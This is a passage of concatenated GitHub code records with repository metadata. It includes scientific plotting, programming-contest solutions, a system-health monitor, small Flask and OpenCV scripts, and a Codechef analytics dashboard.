ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n]['B_C_Alk _flux'],\n linewidth=LNW, alpha=1, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n]['B_C_Alk'],\n linewidth=LNW, label=labels[n])\n\n for n in range(0, 4):\n ax_2.plot(alkflux_bottom_year_2[n]['time'],\n alkflux_bottom_year_2[n]['B_C_Alk _flux'],\n linewidth=LNW, label=labels_2[n])\n ax1_2.plot(alk_year_2[n]['time'], alk_year_2[n]['B_C_Alk'],\n linewidth=LNW, label=labels_2[n])\n\n ax_3.plot(alkflux_bottom_year_3[n]['time'],\n alkflux_bottom_year_3[n]['B_C_Alk _flux'],\n linewidth=2, label=labels_3[n])\n ax1_3.plot(alk_year_3[n]['time'], alk_year_3[n]['B_C_Alk'],\n linewidth=LNW, label=labels_3[n])\n\n for axis in [ax, ax1, ax_2, ax1_2, ax_3, ax1_3]:\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n for axis in [ax, ax_2, ax_3]:\n axis.set_ylabel('mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n axis.set_ylim(0, 27)\n\n for axis in [ax1, ax1_2, ax1_3]:\n axis.set_ylabel('mmol m$^{-3}$', fontsize=FNTSZ)\n axis.legend(loc='upper left',\n title='Porosities:\\n SWI - \"infinite depth\"',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n axis.set_ylim(0, 180)\n ax.set_title('TA fluxes', fontsize=FNTSZ)\n ax1.set_title('Relative Total Alkalinity', fontsize=FNTSZ)\n\n labels = ('(A) ', '(B)', '(C) ', '(D)', '(E)', '(F)')\n for i, axis in enumerate((ax, ax1, ax_2, ax1_2, ax_3, ax1_3)):\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\ndef plot_alk_sulfur_fluxes():\n\n ds1 = xr.open_dataset('data/results/2_po75-25_di1e-9/water.nc')\n ds2 = xr.open_dataset('data/results/3_po75-25_di2e-9/water.nc')\n ds3 = xr.open_dataset('data/results/4_po75-25_di5e-9/water.nc')\n ds4 = xr.open_dataset('data/results/5_po75-25_di10e-9/water.nc')\n\n def get_var_data_time(dtsts, varname):\n varflux_bottom_july, var_mean = [], []\n for i, ds in enumerate(dtsts, start=0):\n varflux_df = ds[varname].to_dataframe()\n varflux_bottom = varflux_df.groupby('z_faces').get_group(2.5)\n varflux_bottom = varflux_bottom.reset_index('z_faces', drop=True)\n varflux_bottom_july.append(varflux_bottom['2011-07-01':\n '2011-08-01'])\n varflux_bottom_july[i] = varflux_bottom_july[i].reset_index()\n var_mean.append(varflux_bottom_july[i][varname].mean())\n return np.array(var_mean), varflux_bottom_july\n\n dtsts = [ds1, ds2, ds3, ds4]\n alk, alkflux_bottom_july = get_var_data_time(dtsts, 'B_C_Alk _flux')\n nh4, nh4flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NH4 _flux')\n no2, no2flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NO2 _flux')\n no3, no3flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_NO3 _flux')\n po4, po4flux_bottom_july = get_var_data_time(dtsts, 'B_NUT_PO4 _flux')\n so4, so4flux_bottom_july = get_var_data_time(dtsts, 'B_S_SO4 _flux')\n h2s, h2sflux_bottom_july = get_var_data_time(dtsts, 'B_S_H2S _flux')\n s0, s0flux_bottom_july = get_var_data_time(dtsts, 'B_S_S0 _flux')\n s2o3, s2o3flux_july = get_var_data_time(dtsts, 'B_S_S2O3 _flux')\n s_total = h2s + s0 + 2*s2o3\n x = np.array([1e-9, 2e-9, 5e-9, 10e-9])\n\n fig = plt.figure(figsize=cm2inch(8.5, 6), constrained_layout=True)\n ax = fig.add_subplot(1, 1, 1)\n ax.plot(x, alk, linewidth=LNW, label=r'alkalinity flux')\n ax.plot(x, s_total, linewidth=LNW, label=r'sulfur flux')\n ax.set_ylim(0, 19)\n\n ax.set_ylabel('Flux, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax.set_xlabel('$kz_{dispersion}$, m$^2$ s$^{-1}$', fontsize=FNTSZ)\n\n ax.legend(loc='upper left', title='Fluxes',\n 
fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n plt.show()\n\n\ndef plot_caco3():\n\n ds = xr.open_dataset('data/results/5_po75-25_di10e-9/water.nc')\n\n alkflux_df = ds['B_C_Alk _flux'].to_dataframe()\n biogrow_df = ds['B_BIO_GrowthPhy'].to_dataframe()\n omresp_df = ds['B_BIO_DcPOM_O2'].to_dataframe()\n alk_df = ds['B_C_Alk'].to_dataframe()\n\n alkflux_bottom = alkflux_df.groupby('z_faces').get_group(2.5)\n alkflux_bottom = alkflux_bottom.reset_index('z_faces', drop=True)\n omresp_bottom = omresp_df.groupby('z').get_group(2.4749999046325684)\n omresp_bottom = omresp_bottom.reset_index('z', drop=True)\n biogrow_surfac = biogrow_df.groupby('z').get_group(0.625)\n biogrow_surfac = biogrow_surfac.reset_index('z', drop=True)\n alk_surface = alk_df.groupby('z').get_group(0.625)\n alk_surface = alk_surface.reset_index('z', drop=True)\n alk_surface_year = alk_surface[START:STOP].reset_index()\n\n year = (('2011-01-01', '2011-01-31'), ('2011-02-01', '2011-02-28'),\n ('2011-03-01', '2011-03-31'), ('2011-04-01', '2011-04-30'),\n ('2011-05-01', '2011-05-31'), ('2011-06-01', '2011-06-30'),\n ('2011-07-01', '2011-07-31'), ('2011-08-01', '2011-08-31'),\n ('2011-09-01', '2011-09-30'), ('2011-10-01', '2011-10-31'),\n ('2011-11-01', '2011-11-30'), ('2011-12-01', '2011-12-31'))\n\n year_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n alk_year_delta = []\n alk_year = []\n bio_year = []\n res_year = []\n for month in year:\n alk_delta_month = alk_surface[month[0]:month[1]]\n alk_month = alkflux_bottom[month[0]:month[1]]\n bio_month = biogrow_surfac[month[0]:month[1]]\n res_month = omresp_bottom[month[0]:month[1]]\n alk_year_delta.append(alk_delta_month['B_C_Alk'][0])\n alk_year.append(alk_month['B_C_Alk _flux'].mean())\n bio_year.append(bio_month['B_BIO_GrowthPhy'].mean())\n res_year.append(res_month['B_BIO_DcPOM_O2'].mean())\n\n bio_year_quotas = np.array(bio_year)/sum(bio_year)\n res_year_quotas = np.array(res_year)/sum(res_year)\n caco3_precipitation = bio_year_quotas*1000/year_days\n caco3_dissolution = res_year_quotas*1000/year_days\n ca_flux = caco3_dissolution - caco3_precipitation\n ca_array = np.array(ca_flux)/2.5*2\n\n alk_array = np.array(alk_surface_year['B_C_Alk'])\n alkflux_bottom_year = alkflux_bottom[START:STOP].reset_index()\n\n calpart = np.zeros(365)\n day = 0\n last_entry = 0\n for month, increment in zip(year_days, ca_array):\n temp = np.linspace(last_entry+increment,\n last_entry+increment*month, num=month)\n calpart[day:day+month] = temp\n last_entry = temp[-1]\n day += month\n\n result_array = alk_array + calpart\n\n caco3_dis = np.zeros(365)\n day = 0\n for month, increment in zip(year_days, caco3_dissolution):\n caco3_dis[day:day+month] = increment\n day += month\n\n caco3_pre = np.zeros(365)\n day = 0\n for month, increment in zip(year_days, caco3_precipitation):\n caco3_pre[day:day+month] = increment\n day += month\n\n fig = plt.figure(figsize=(12, 10))\n ax1 = fig.add_subplot(2, 1, 1)\n ax2 = fig.add_subplot(2, 1, 2)\n\n ax1.xaxis_date()\n ax2.xaxis_date()\n ax1.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n ax2.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n ax1.plot(alk_surface_year['time'], caco3_dis*2,\n label='CaCO$_3$ dissolution')\n ax1.plot(alk_surface_year['time'], caco3_pre*2,\n label='CaCO$_3$ precipitation')\n ax1.plot(alk_surface_year['time'], alkflux_bottom_year['B_C_Alk _flux'],\n label='Modelled TA flux at the SWI')\n ax1.plot(alk_surface_year['time'],\n caco3_dis*2+alkflux_bottom_year['B_C_Alk _flux'], linewidth=2,\n label=r'CaCO$_3$ 
dissolution + TA flux at the SWI')\n ax1.set_ylabel('TA fluxes, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax1.legend(fontsize=LGNDSZ, title_fontsize=LGNDSZ,\n loc=\"best\", borderaxespad=0)\n\n ax2.plot(alk_surface_year['time'], calpart-calpart.min(), linewidth=2,\n label=r'Due to CaCO$_3$ dissolution/precipitation')\n ax2.plot(alk_surface_year['time'], alk_array-alk_array.min(), linewidth=2,\n label=r'From the model calculations')\n ax2.plot(alk_surface_year['time'], result_array-result_array.min(),\n linewidth=2, label=r'CaCO$_3$ + model calculations')\n ax2.set_ylabel('Relative TA, mmol m$^{-3}$', fontsize=FNTSZ)\n ax2.legend(fontsize=LGNDSZ, title_fontsize=LGNDSZ,\n loc=\"best\", borderaxespad=0)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax1, ax2)):\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\nif __name__ == \"__main__\":\n plot_intro()\n # plot_alkalinity_flux_low_high()\n # plot_alkalinity_flux_sulfur_oxidation()\n # plot_alkalinity_flux_porosities1_2_3()\n # plot_alk_sulfur_fluxes()\n # plot_caco3()\n","repo_name":"limash/Alkalinity_in_the_Wadden_Sea","sub_path":"src/prepared_plots.py","file_name":"prepared_plots.py","file_ext":"py","file_size_in_byte":20721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"30860822247","text":"from fractions import Fraction\n\ninfile = open(\"casino.in\", \"r\")\noutfile = open(\"casino.out\", \"w\")\n\nn, m, k, c, l = [int(x) for x in infile.readline().strip().split()]\nwheel = [[0 for i in range(26)] for j in range(n)]\nfor i in range(n):\n for v in infile.readline().strip():\n wheel[i][ord(v)-ord('A')] += 1\n\nans = 0\nfor i in range(c):\n s, pay = infile.readline().strip().split()\n pay = int(pay)\n cnt = 1\n for i in range(n):\n if s[i] == '*':\n cnt *= m\n else:\n cnt *= wheel[i][ord(s[i])-ord('A')]\n ans += Fraction(pay * cnt, m ** n)\n\nif ans > 1:\n ans -= 1\n outfile.write(\"{}/{}\\n\".format(ans.numerator, ans.denominator))\n outfile.write(\"{}\\n\".format(l))\n outfile.write(\"{}\\n\".format(\" \".join([str(x+1) for x in range(l)])))\nelse:\n outfile.write(\"0/1\\n\")\n outfile.write(\"0\\n\")\n\n\n","repo_name":"ehnryx/acm","sub_path":"asc19-cf100324/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"}
+{"seq_id":"9629243972","text":"# written by Lekhraj(USD) pandeylekhraj4447@gmail.com\n#importing libraries main library is psutil midas.client communicates with odb page \n\nimport psutil\nimport numpy as np\nimport os\nimport pytz\nfrom datetime import datetime\nfrom pytz import timezone\nimport midas.client\nimport socket\nimport json\nimport os.path\n\n#connecting my script to odb\nclient = midas.client.MidasClient(\"pytest\")\n\n#for getting time \ntz_Pac = pytz.timezone('US/Pacific')\ndatetime = datetime.now(tz_Pac)\ndatetime= datetime.strftime('%a %b %d %H:%M:%S %Z %Y')\n#print(datetime)\n#get hostname\nhostoutput= socket.gethostname()\nhostoutput=hostoutput.split('.')[0]\n#path inside midas client is path in the odb where the threshold comparable values comes from odb page\nODBTest=client.odb_get(\"/HealthMonitoring/ComputerMonitoring/ThresholdControl/\"+hostoutput+\"/ODB_Test_Value\")\nODB_test_variable=int(ODBTest)\nDiskSpaceThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/NumDiskaboveTest_Value')\nMeanProcessorThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/MeanCPUutilThreshold')\nMemThreshold=client.odb_get('/HealthMonitoring/ComputerMonitoring/ThresholdControl/'+hostoutput+'/MemUtilThreshold')\n\n\n\ndef disk_partition():\n\n ''' We are using library psutil and trying to get detail of disk partions. We are finding\n total number of partitions, maximum usgae and minimum usage. Also, we keep ODB_test_variable and try\n to get disk partion higher then ODB_test_variable\n\n '''\n \n num_of_partitions = 0\n higher_than_threshold = 0\n max_usage = 0\n min_usage =100\n #print('Threshold Percentage Value for Disk = {} % '.format(str(ODB_test_variable)))\n #templ = \"%-17s %8s %8s %8s %5s%% %9s %s\"\n #print(templ % (\"Device\", \"Total\", \"Used\", \"Free\", \"Use \", \"Type\",\n # \"Mount\"))\n templ=\"%-17s %5s%%\"\n filesystem=[]\n usedpercent=[]\n for part in psutil.disk_partitions(all=False):\n #print(os.name)\n if os.name == 'nt':\n if 'cdrom' in part.opts or part.fstype == '':\n # skip cd-rom drives with no disk in it; they may raise\n # ENOENT, pop-up a Windows GUI error for a non-ready\n # partition or just hang.\n continue\n usage = psutil.disk_usage(part.mountpoint)\n templ % (\n filesystem.append(part.device),\n usedpercent.append(usage.percent))\n\n # FreeListPer= list(map(lambda x: round(100 - x,2), usedpercent))\n # print(filesystem)\n # print(usedpercent)\n # print(FreeListPer)\n for values in usedpercent:\n #print(df3_df['filesystem'],values)\n values = float(values)\n #print(values)\n #converting string into float\n num_of_partitions += 1\n if values > max_usage:\n max_usage =values\n # print(max_usage)\n if values < min_usage:\n min_usage =values\n # print(min_usage)\n if values > ODB_test_variable:\n higher_than_threshold += 1\n if higher_than_threshold < 1:\n higher_than_threshold = 0\n return [num_of_partitions, max_usage, min_usage, higher_than_threshold]\n\n \ndef Processor_Utilization():\n\n ''' We are using library psutil and trying to get detail of num of CPU used and their respective\ncpu utilization percentage. 
We are keeping maximum,minumium cpu utilization and number of cpu in webpage\n '''\n\n num_CPUs = psutil.cpu_count()\n CPUsUtilization_percent = psutil.cpu_percent(interval=1,percpu=True)\n MeanValue=sum(CPUsUtilization_percent)/len(CPUsUtilization_percent)\n MeanValue=round(MeanValue,3)\n return[num_CPUs,CPUsUtilization_percent,MeanValue] \n\n\ndef MemoryUtilization():\n # print('\\n\\n********Memory Utilization*********\\n\\n')\n ''' We are using library psutil and trying to get detail of virtual and swap\n memory using psutil.virtual_memory() and psutil.swap_memory(). We are finding\n ntotal memory in GB by converting bytes into GB and we are finding Memory Utilization\n (total -avialable)*100/total in term of percentage in case both of RAM and Swap \n '''\n\n Memory= psutil.virtual_memory()\n SwapMemory= psutil.swap_memory()\n MemTot= round(Memory.total/(1024**3),2)\n SwapMemTot= round(SwapMemory.total/(1024**3),2)\n MemPercent= Memory.percent\n SwapMemPercent= SwapMemory.percent\n return [MemTot, SwapMemTot, MemPercent, SwapMemPercent]\n\n# values from processor utilization, disk Space Utilization & memoryutilization \n\nProcessor_=Processor_Utilization()\ndisk_=disk_partition()\nMemory_=MemoryUtilization()\n\njson1={'hostname':hostoutput,'DiskSpaceUtilization':{'LastRead':datetime,'nmDiskSpaceChk':disk_[0],'MaxDiskSpaceChk%':disk_[1],'MinDiskSpaceChk%':disk_[2],'nmGtrThreshold':disk_[3]},'ProcessorUtilization':{'LastRead':datetime,'nmCPUs':Processor_[0],'MaxCPUutilized%':max(Processor_[1]),'MinCPUutilized%':min(Processor_[1]),'MeanCPUutilized%':Processor_[2]},'MemoryUtilization':{'LastRead':datetime,'MemoryUsed%':Memory_[1],'MemTotinGB':Memory_[0],'SwapMemoryused%':Memory_[3],'SwapMemTotinGB':Memory_[2]},'Alarm':[hostoutput,ODB_test_variable,DiskSpaceThreshold,MeanProcessorThreshold,MemThreshold,disk_[3],Processor_[2],Memory_[1]]}\n#print(json1)\n#Pathwhere the code is running\n#PathJson= os.path.join(os.getcwd())\n#print(PathJson)\nPathJson=\"/home/cdms/health_monitoring/Computermonitoring/SystemHealthMonitor/FinalCompMonitoring\"\nout_file = open(str(PathJson)+\"/Json/\"+ str(hostoutput) +\".json\", \"w\")\njson.dump(json1, out_file)\n\nout_file.close()\n\n","repo_name":"pandeylekhraj/SystemHealthMonitor","sub_path":"FinalCompMonitoring/ReturnJsonFileCompMonitor.py","file_name":"ReturnJsonFileCompMonitor.py","file_ext":"py","file_size_in_byte":5566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"14062143390","text":"from flask import Flask, render_template, request, redirect\napp = Flask(__name__) \n\nimport time\n\n@app.route('/') \ndef index():\n return render_template(\"index.html\")\n\n@app.route('/checkout', methods=['POST']) \ndef checkout():\n strawberry = request.form[\"strawberry\"]\n raspberry = request.form[\"raspberry\"]\n blackberry = request.form[\"blackberry\"]\n apple = request.form[\"apple\"]\n fruits = {\"strawberry\":strawberry,\"raspberry\":raspberry,\"blackberry\":blackberry,\"apple\":apple}\n\n fname = request.form[\"first_name\"]\n lname = request.form[\"last_name\"]\n student_id = request.form[\"student_id\"]\n\n items = int(strawberry) + int(raspberry) + int(blackberry) + int(apple)\n\n localtime = time.asctime( time.localtime(time.time()) )\n\n return render_template(\"checkout.html\", fruits=fruits, fname=fname, lname=lname, student_id=student_id, items=items, localtime=localtime)\n\n@app.route('/fruits') \ndef fruits():\n fruits = [\"apple.png\", \"blackberry.png\", \"raspberry.png\", \"strawberry.png\"]\n return render_template(\"fruits.html\", fruits=fruits)\n\nif __name__==\"__main__\": \n app.run(debug=True) ","repo_name":"GustavoMonardez/python-flask-cd-fruit-store","sub_path":"fruit-store.py","file_name":"fruit-store.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"15636549356","text":"#! /usr/bin/env python\nimport cv2\nimport sys\n\ndef find_face_image():\n\t# image to analyze/Cascade for opencv to perform analysis\n\timagePath = \"YourImagePath\"\n \n \t# You need to download this xml file. It's necessary for the program to run\n\tcascPath = \"/YourPath/haarcascade_frontalface_default.xml\"\n\n\t# Read the image and convert to grayscale\n\timage = cv2.imread(imagePath)\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\t# Create the haar cascade. Used for algorithm to find faces\n\tface_cascade = cv2.CascadeClassifier(cascPath)\n\n\t# Detect faces in the image\n\tfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\tfor (x,y,w,h) in faces:\n\t cv2.rectangle(image,(x,y),(x+w,y+h),(255,0,0),2)\n\t roi_gray = gray[y:y+h, x:x+w]\n\t roi_color = image[y:y+h, x:x+w]\n\n\t# Print out how many faces were found in the image\n\tprint(\"Found {0} faces!\".format(len(faces)))\n\n\t# Show the image with the selected faces. If user enters ESC key then exit program\n\twhile True:\n\t\tcv2.imshow(\"Faces found\", image)\n\t\t\n\t\tif cv2.waitKey(1) & 0xFF == 27:\n\t\t\tbreak\n\n\tcv2.destroyAllWindows()\n","repo_name":"spencerneveux/FacialRecognition","sub_path":"detect_face.py","file_name":"detect_face.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"9489547030","text":"import itertools\nN = input()\nN = int(N)\nAs = list(map(int,input().split(\" \")))\nans = 0\nl = 0\nr = 0\nbefore = 0\nwhile l< N:\n while N > r >= l and before self.your_power:\n print(\"我赢了!\")\n else:\n print(\"你赢了\")\n\n\n\n\n","repo_name":"chenrong1105/chenrong_zuoye","sub_path":"pythoncs/python_zuoye/zuoye2/zuoye2_TongLao.py","file_name":"zuoye2_TongLao.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"38805992789","text":"# Need to create a Human class with attributes: name, surname, age, phone, address\n# Attributes must be filled in the __init__ method\n# You also need to write methods:\n#\n# get_info(self) - which returns a dictionary containing information about the person\n# call(self, phone_number) - which will output \"{self.phone} calling {phone_number}\"\n# You need to create 3 objects of the Human class and call the get_info method on them\n\n\nclass Human:\n\n def __init__(self, name: str, surname: str, age: int, phone: str, address: str):\n self.name = name\n self.surname = surname\n self.age = age\n self.phone = phone\n self.address = address\n\n def get_info(self):\n human_info = {\n 'name': self.name,\n 'surname': self.surname,\n 'age': self.age,\n 'phone': self.phone,\n 'address': self.address,\n }\n return human_info\n\n def call(self, phone_number):\n print(f'{self.phone} calling {phone_number}')\n\n\ninfo1 = Human('Bob', 'Dylan', 45, '+981234567890', 'Fulton St. 654')\ninfo2 = Human('Jim', 'Carrie', 59, '+380234342313', 'Lafayette Av. 12')\ninfo3 = Human('Mishel', 'Pfeiffer', 23, '+86783451242', 'St. Marks Pl. 1')\nprint(info1.get_info())\nprint(info2.get_info())\nprint(info3.get_info())\n\n","repo_name":"spasmx/hillel_aqa_rep","sub_path":"class_human_hw13.py","file_name":"class_human_hw13.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"23590032002","text":"\"\"\"\n经典全组合 直接调用库函数 其实为了点进去看看他的实现代码\n\"\"\"\nimport itertools\n\n\nclass Solution:\n def subsets(self, nums):\n results = []\n for i in range(len(nums) + 1):\n for r in itertools.combinations(nums, i):\n results.append(list(r))\n return results\n\n\ns = Solution()\nprint(s.subsets([1, 2, 3]))\n","repo_name":"algorithm002/algorithm","sub_path":"Week_04/id_3/backtracking/LeetCode_78_3_v2.py","file_name":"LeetCode_78_3_v2.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"66"}
+{"seq_id":"27933185025","text":"\n\nimport random\n\n\nboard = [[\" \" for _ in range(9)] for _ in range(9)]\npossible_board = [[[\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"] for _ in range(9)] for _ in range(9)]\n\ndef print_board(board):\n for line in board:\n print(line)\n\n#print_board(board)\n\ndef is_legal(to_check: list):\n to_check = [val for val in to_check if val != ' ']\n return len(to_check) == len(set(to_check))\n\ndef is_board_legal(board):\n for i in range(9):\n # Lines\n if not is_legal(board[i]):\n return False\n # Cols\n elif not is_legal([board[j][i] for j in range(9)]):\n return False\n # Cells\n j = i % 3 * 3\n i //= 3\n cell = [\n board[i][j], board[i][j+1], board[i][j+2],\n board[i+1][j], board[i+1][j+1], board[i+1][j+2],\n board[i+2][j], board[i+2][j+1], board[i+2][j+2]\n ]\n if not is_legal(cell):\n return False\n return True\n\ndef cells_with_no_choice(board):\n for line in possible_board:\n for possible in possible_board:\n if len(possible) == 0:\n return True\n return False\n\n\ndef update_cell_possibilities(modified_cell):\n pass\n\n'''\nboard = [\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n \n]\n'''\n\nwhile True:\n best_len = 10\n best = []\n for l, line in enumerate(board):\n for c, cell in enumerate(line):\n if len(possible_board[l][c]) < best_len:\n best_len = len(possible_board[l][c])\n best = [[l, c]]\n elif len(possible_board[l][c]) == best_len:\n best.append([l, c])\n \n chosen = random.choice(best)\n board[chosen[0]][chosen[1]] = random.choice(possible_board[chosen[0]][chosen[1]])\n","repo_name":"Mactywd/puzzles","sub_path":"sudoku/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"7554761777","text":"# n! means n × (n − 1) × ... × 3 × 2 × 1\n\n# For example, 10! = 10 × 9 × ... × 3 × 2 × 1 = 3628800,\n# and the sum of the digits in the number 10! is 3 + 6 + 2 + 8 + 8 + 0 + 0 = 27.\n\n# Find the sum of the digits in the number 100!\n\nfrom math import factorial\n\nnumber = factorial(100)\ntotal = 0\n\nfor num in str(number):\n total += int(num)\n\nprint(total)\n","repo_name":"alexLaws/projectEuler","sub_path":"020problem.py","file_name":"020problem.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"16965067718","text":"import dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport plotly.graph_objects as go\nfrom config import DATA_DIR\n\n\"\"\"\nQuestions\n\"\"\"\n\n\ndef plot_questions_tag_chart(df):\n fig = go.Figure([\n go.Bar(x=df[\"SubmissionCount\"], y=df[\"Tags\"], orientation=\"h\"),\n ])\n fig.update_layout(yaxis=dict(autorange=\"reversed\"))\n fig.update_layout(xaxis=dict(title=\"Total Number of Submissions by Tags\"))\n return fig\n\n\nquestions_df = pd.read_csv(DATA_DIR / \"codechef/questions.csv\", index_col=[0])\n\nquestions_df_with_count = questions_df.dropna(subset=[\"SubmissionCount\"]).copy()\nquestions_df_with_count[\"Tags\"] = questions_df_with_count[\"Tags\"].apply(lambda tags: eval(tags))\ntag_count_top_10 = questions_df_with_count \\\n .explode(\"Tags\") \\\n .groupby(\"Tags\")[\"SubmissionCount\"] \\\n .sum().sort_values(ascending=False)[:10]\nfig1 = plot_questions_tag_chart(pd.DataFrame(tag_count_top_10).reset_index())\n\n\"\"\"\nSolutions\n\"\"\"\n\n\ndef plot_submissions_tag_chart(df):\n fig = go.Figure([\n go.Bar(x=df[\"UserID\"], y=df[\"Language\"], orientation=\"h\"),\n ])\n fig.update_layout(yaxis=dict(autorange=\"reversed\"))\n fig.update_layout(xaxis=dict(title=\"Total Number of Submissions by Languages\"))\n return fig\n\n\nsolutions_df = pd.read_csv(DATA_DIR / \"codechef/solutions.csv\", index_col=[1])\nlanguage_count = solutions_df \\\n .reset_index()[[\"UserID\", \"Language\"]] \\\n .drop_duplicates() \\\n .groupby(\"Language\")[\"UserID\"] \\\n .count() \\\n .sort_values(ascending=False)[:10]\nfig2 = plot_submissions_tag_chart(pd.DataFrame(language_count).reset_index())\n\n\ndef plot_language_invalid_state_chart(df):\n status = df[\"Status\"].unique()\n sum_df = df.groupby(\"Language\").agg({\"SolutionID\": \"sum\"})\n sorted_index = sum_df.sort_values(\"SolutionID\", ascending=False).index\n percentage_df = df.groupby([\"Language\", \"Status\"]).agg({\"SolutionID\": \"sum\"}). \\\n div(sum_df, level=\"Language\"). \\\n reset_index(). \\\n set_index(\"Language\").loc[sorted_index]. 
\\\n reset_index()\n fig = go.Figure([\n go.Bar(\n name=state,\n x=percentage_df[percentage_df[\"Status\"] == state][\"Language\"],\n y=percentage_df[percentage_df[\"Status\"] == state][\"SolutionID\"],\n )\n for state in status])\n fig.update_layout(dict(barmode=\"stack\"))\n fig.update_layout(xaxis=dict(title=\"Types of Unsuccessful Submissions by Languages\"))\n return fig\n\n\nvalid_state = [\"accepted\", \"wrong answer\", \"internal error\", \"running..\", \"compiling..\", \"running judge..\"]\nsolutions_df_valid_state = solutions_df.dropna(subset=[\"Status\"]).reset_index()\ninvalid_state_count = solutions_df_valid_state[~solutions_df_valid_state[\"Status\"].isin(valid_state)] \\\n .groupby([\"Status\", \"Language\"])[\"SolutionID\"] \\\n .count() \\\n .reset_index()\ntop_languages_with_invalid_sum = pd.DataFrame(invalid_state_count\n .groupby(\"Language\")[\"SolutionID\"]\n .sum()\n .sort_values(ascending=False)[:10]).reset_index()\nstate_df = invalid_state_count[invalid_state_count[\"Language\"].isin(top_languages_with_invalid_sum[\"Language\"])]\nfig3 = plot_language_invalid_state_chart(state_df)\n\n\ndef plot_pie_chart(df, level_range):\n charts = []\n for level in level_range:\n fig = go.Figure(\n data=[go.Pie(\n labels=df.loc[level, \"SolutionStatus\"],\n values=df.loc[level, \"SolutionID\"],\n hole=.3,\n textinfo=\"label+percent\",\n marker=dict(colors=[\"red\", \"royalblue\"]))\n ],\n layout=dict(annotations=[\n {\n \"font\": {\n \"size\": 16,\n \"color\": '#5A5A5A'\n },\n \"showarrow\": False,\n \"text\": level,\n \"x\": 0.5,\n \"y\": 0.5\n }\n ])\n )\n fig.update(dict(layout_showlegend=False))\n charts.append(fig)\n return charts\n\n\nlevels = [\"beginner\", \"easy\", \"medium\", \"hard\", \"challenge\"]\nsolutions_df_levels = solutions_df.join(questions_df[\"level\"], on=\"QCode\")\nsolutions_df_levels.loc[solutions_df_levels[\"Status\"] == \"accepted\", \"SolutionStatus\"] = \"Passed\"\nsolutions_df_levels.loc[solutions_df_levels[\"Status\"] != \"accepted\", \"SolutionStatus\"] = \"Failed\"\nsolutions_df_levels = solutions_df_levels.groupby([\"level\", \"SolutionStatus\"])[\"SolutionID\"].count().reset_index()\nfigures = plot_pie_chart(solutions_df_levels.set_index(\"level\"), levels)\n\ncodechef_visualization = dbc.Container([\n html.H1(\"Codechef Competitive Programming Analytics\"),\n html.Hr(),\n dbc.Col([\n html.H3(\"Overview of Passing/Failing Submissions by Levels\"),\n dbc.Row(list(map(lambda figure: dcc.Graph(figure=figure, style=dict(width=f\"33%\")), figures[:3])),\n justify=\"center\"),\n dbc.Row(list(map(lambda figure: dcc.Graph(figure=figure, style=dict(width=f\"33%\")), figures[3:])),\n justify=\"center\"),\n html.H3(\"Detailed Submission 